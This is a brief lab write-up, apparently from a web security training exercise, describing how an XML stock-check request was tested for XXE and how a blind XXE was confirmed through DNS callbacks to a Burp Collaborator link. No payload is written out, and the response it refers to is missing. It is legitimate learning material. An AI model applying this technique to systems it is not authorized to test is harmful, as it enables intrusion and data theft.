We were able to see an XML POST request being sent when we clicked the “Check Stock” button. We used a simple XXE payload but received the following response:
We then replaced the URL with a Burp Collaborator link and were able to exploit a Blind XXE.
We saw DNS requests in the collaborator and confirmed the vulnerability.
Finally, we solved the lab.
